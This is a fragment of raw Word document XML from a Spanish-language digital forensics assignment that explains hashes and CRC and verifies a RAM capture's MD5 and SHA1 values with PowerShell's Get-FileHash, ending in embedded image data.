        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="000473CF" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000473CF" w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>en MD5 y en SHA1 de los archivos tal y como se muestra en la siguiente imagen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527CA3CD" w14:textId="77777777" w:rsidR="009440E4" w:rsidRPr="009440E4" w:rsidRDefault="009440E4" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A651C2E" w14:textId="37C9C44E" w:rsidR="000473CF" w:rsidRPr="000473CF" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Como Podemos ver, </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashes</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hashes: Plural de hash."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">resúmenes del archivo de la </w:t>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>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0473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, tememos los siguientes hashes en MD5 y en SHA1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9EFC7" w14:textId="7D4EEA90" w:rsidR="000473CF" w:rsidRPr="00932B2D" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932B2D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MD5: 75a99b57032aa34ba19042ed85db273f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F008548" w14:textId="108E5320" w:rsidR="000473CF" w:rsidRPr="00932B2D" w:rsidRDefault="000473CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932B2D">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SHA1: cc1fad2af321b8c2ddf0103986e3b344eb8f2cc8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5200639A" w14:textId="028E4CFE" w:rsidR="000473CF" w:rsidRPr="000473CF" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El </w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tal y como se indica en los apuntes de la asignatura, en el módulo de Fases y metodología del análisis forense, durante la adquisición de evidencias digitales dice lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14482893" w14:textId="77777777" w:rsidR="009A067C" w:rsidRPr="001D7290" w:rsidRDefault="009A067C" w:rsidP="009A067C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una vez generada la copia o clon del soporte original, el programa o el dispositivo hardware empleado en este proceso realiza el cálculo del CRC</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CRC (Cyclic Redundancy Check): Método utilizado para detectar errores en la transmisión de datos."</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o del valor hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> del soporte original y del destino, con la finalidad de garantizar que los dos son idénticos y que la copia se ha producido sin ningún error. Este cálculo puede realizarse sobre todo el conjunto de información contenida en el soporte original, o bien emplear solamente un conjunto de ficheros del total.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4949D9" w14:textId="77777777" w:rsidR="009A067C" w:rsidRPr="001D7290" w:rsidRDefault="009A067C" w:rsidP="009A067C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A su vez, en el glosario de términos la definición de hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A2D762" w14:textId="77777777" w:rsidR="009A067C" w:rsidRPr="001D7290" w:rsidRDefault="009A067C" w:rsidP="009A067C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Es una función matemática unidireccional que resume un mensaje de tamaño variable (por ejemplo, un archivo), en una representación de tamaño fijo. Es poco probable que dos ficheros distintos tengan la misma representación hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, lo cual significa que este valor puede utilizarse a efectos de comprobación de la integridad</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de un archivo (o de un sistema entero). Las funciones hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> más conocidas son MD5 y SHA-1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D7B32" w14:textId="5A65ADED" w:rsidR="000473CF" w:rsidRPr="000473CF" w:rsidRDefault="000473CF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una vez descargado el archivo de captura de la memoria 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0473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, procedemos a usar PowerShell para determinar el </w:t>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001D7290">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000473CF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>del archivo. Para ello usamos el comando "Get-FileHash [Argumento] -Algorithm MD5". En nuestro caso hemos usado los siguientes comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4D5F5" w14:textId="745097B9" w:rsidR="00D52A79" w:rsidRPr="008235EF" w:rsidRDefault="008235EF" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155653758 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>II. Comando hash MD5 y SHA1 de la memoria RAM</w:t>
      </w:r>
      <w:r w:rsidR="00117A4E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008235EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E98CBC7" w14:textId="6E8BCECA" w:rsidR="000473CF" w:rsidRPr="000473CF" w:rsidRDefault="00487731" w:rsidP="000473CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251892736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04890376" wp14:editId="558C462D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1833</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>347297</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5396917" cy="1451610"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="542807701" name="Grupo 18"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5396917" cy="1451610"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5396917" cy="1451610"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1199502425" name="Imagen 6" descr="Texto&#10;&#10;Descripción generada automáticamente"/>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736975" cy="1451610"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="689151995" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3838627" y="621102"/>
                            <a:ext cx="1558290" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="49374C9E" w14:textId="4622D8F1" w:rsidR="00831684" w:rsidRPr="000B3212" w:rsidRDefault="00831684" w:rsidP="00831684">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>9</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="33" w:name="_Toc155782576"/>
                              <w:r w:rsidRPr="00FE2939">
                                <w:t>Captura imagen hash PowerShell.</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890376" id="Grupo 18" o:spid="_x0000_s1041" style="position:absolute;left:0;text-align:left;margin-left:-.15pt;margin-top:27.35pt;width:424.95pt;height:114.3pt;z-index:251892736" coordsize="53969,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sJEogMAADEIAAAOAAAAZHJzL2Uyb0RvYy54bWycVdtu2zgQfV+g/0Bo&#10;gX1rZNmxY3vjFK6zCQIErdGk6DNNURZRieSS9CX7N/sN/YT+WM9QktPEXTTbB8vD28zhmTPD8zf7&#10;umJb6bwyepZkJ72ESS1MrvR6lny8v3o9TpgPXOe8MlrOkgfpkzcXr34739mp7JvSVLl0DE60n+7s&#10;LClDsNM09aKUNfcnxkqNxcK4mgcM3TrNHd/Be12l/V5vlO6My60zQnqP2ctmMbmI/otCivC+KLwM&#10;rJolwBbi18Xvir7pxTmfrh23pRItDP4LKGquNIIeXF3ywNnGqSNXtRLOeFOEE2Hq1BSFEjLeAbfJ&#10;es9uc+3Mxsa7rKe7tT3QBGqf8fTLbsW77bWzd3bpwMTOrsFFHNFd9oWr6R8o2T5S9nCgTO4DE5gc&#10;DiajSXaWMIG17HSYjbKWVFGC+aNzovzrJyfTLnD6BI5VYopfywGsIw5+rhWcChsnk9ZJ/SIfNXef&#10;N/Y10mV5UCtVqfAQpYfEECi9XSqxdM0AdC4dUzm4yCaTYa9/2h8mTPMa0r+p+VpqNkpYLr2ABu9B&#10;ovnj9/38z/i5pFllhfr6RTPslI7nnPFNMPXXf4MScKKDJMVSWIrUxOXEy60Rnz3TZlFyvZZzb6F8&#10;gKDd6dPtcfgE9KpS9kpVFeWa7JYeIHymsh8w3Cj40ogNoWtK0skKTBntS2V9wtxU1isJStxNnkEo&#10;aAcBdFindGjqzwcngygpfgEcH4CdcPPpYSGCfsRJN/LQ7EtVOjgbjCZnyMQzlR60Bg6dD9fS1IwM&#10;YAUGJJhP+fbWt2i6LS2lDYCIDHioetDCfMceRkf8/a8qvSu5lYBAbh9lNRpPsiFJq1PVYsNzZyAp&#10;FkhOLKa8PUNlzcL+rUGhHub/g7fBeDAe9VHIqONRP8t6/SY3XaFnw+G4P0ELJQpPsyHZTZK6NtHR&#10;8yIGkVtTqbyTHZ1dVI5tOfr0rlSNzkkB3++qNGVEGzrVxKYZ9AnfqoGssF/tYwWeET6aWZn8AUQ4&#10;g7ziAt6KK4V4t9yHJXdo95jEExbe41NUZjdLTGslrDTunx/N037kF6sJ2+H5mCX+7w2n3lLdaGSe&#10;3prOcJ2x6gy9qRcGN0U5AE00ccCFqjMLZ+pPeNnmFAVLXAvEmiWhMxcBIyzgZRRyPo9206Ju9Z1F&#10;Y8uieonX+/0n7mybFRLJO9Np60jezV5i2ds5Os+Vitp/ZLGlGzqPVnyXYD15+L4fx12PL/3FNwAA&#10;AP//AwBQSwMECgAAAAAAAAAhADoBOU9PcQAAT3EAABQAAABkcnMvbWVkaWEvaW1hZ2UxLnBuZ4lQ&#10;TkcNChoKAAAADUlIRFIAAAPKAAABeQgGAAAAR67TxgAAAAFzUkdCAK7OHOkAAAAEZ0FNQQAAsY8L&#10;/GEFAAAACXBIWXMAAA7DAAAOwwHHb6hkAAAAYWlUWHRTbmlwTWV0YWRhdGEAAAAAAHsiY2xpcFBv&#10;aW50cyI6W3sieCI6MCwieSI6MH0seyJ4I